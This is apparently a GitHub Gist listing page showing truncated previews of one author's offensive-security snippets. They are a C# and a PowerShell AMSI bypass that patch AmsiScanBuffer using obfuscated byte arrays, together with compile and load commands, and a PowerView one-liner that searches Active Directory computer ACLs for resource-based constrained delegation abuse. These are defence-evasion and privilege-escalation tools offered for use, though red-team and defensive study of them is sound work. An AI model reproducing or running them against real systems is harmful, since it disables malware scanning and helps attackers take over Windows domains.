Skip to content

Instantly share code, notes, and snippets.

@FatRodzianko
FatRodzianko / my-dotnet-am-bypass.cs
Created Aug 23, 2020
AMSI bypass that modifies the bytes of the patch and then changes them in a for loop. ".\csc.exe -target:library -out:C:\Exclusions\my-dotnet-am-bypass.dll C:\Exclusions\my-dotnet-am-bypass.cs" "Add-Type -Path C:\Exclusions\my-dotnet-am-bypass.dll" "[Amsi]::Bypass()"
View my-dotnet-am-bypass.cs
using System;
using System.Runtime.InteropServices;
public class Amsi
{
static byte[] patch = new byte[] { 0xBA, 0x59, 0x02, 0x09, 0x82, 0xC5 };
public static void Bypass()
@FatRodzianko
FatRodzianko / my-am-bypass.ps1
Last active Dec 24, 2022
small modification to Rastemouse's AmsiScanBuffer bypass to use bytes. Uses different opcode bytes
View my-am-bypass.ps1
$Win32 = @"
using System;
using System.Runtime.InteropServices;
public class Win32 {
[DllImport("kernel32")]
public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
[DllImport("kernel32")]
@FatRodzianko
FatRodzianko / Get-RBCD.ps1
Created Dec 18, 2019
Use Powerview to find resource-based constrained delegation (RBCD) in active directory
View Get-RBCD.ps1
# Get all sids, all computer object ACLs, and find RBCD!!!
$usersid = get-domainuser | select -exp objectsid; "Got user SIDS"; $computeracls = Get-DomainComputer | select -exp dnshostname | get-domainobjectacl; "Got computer ACLs"; "Search through acls for RBCD..."; foreach ($acl in $computeracls) { foreach($sid in $usersid) { $acl | ?{$_.SecurityIdentifier -eq $sid -and ($_.ActiveDirectoryRights -Like '*GenericAll*' -or $_.ActiveDirectoryRights -Like '*GenericWrite*' -or $_.ActiveDirectoryRights -Like '*WriteOwner*')} } }
# Get all SIDS, all computer object ACLs, and find RBCD
$groupsid = $groups = Get-DomainGroup | Where-Object {$_.SamAccountName -ne "Domain Admins" -and $_.SamAccountName -ne "Account Operators" -and $_.SamAccountName -ne "Enterprise Admins" -and $_.SamAccountName -ne "Administrators" -and $_.SamAccountName -ne "DnsAdmins" -and $_.SamAccountName -ne "Schema Admins" -and $_.SamAccountName -ne "Key Admins" -and $_.SamAccountName -ne "Enterprise Key Admins" -and $_.SamAccountName -ne "Storage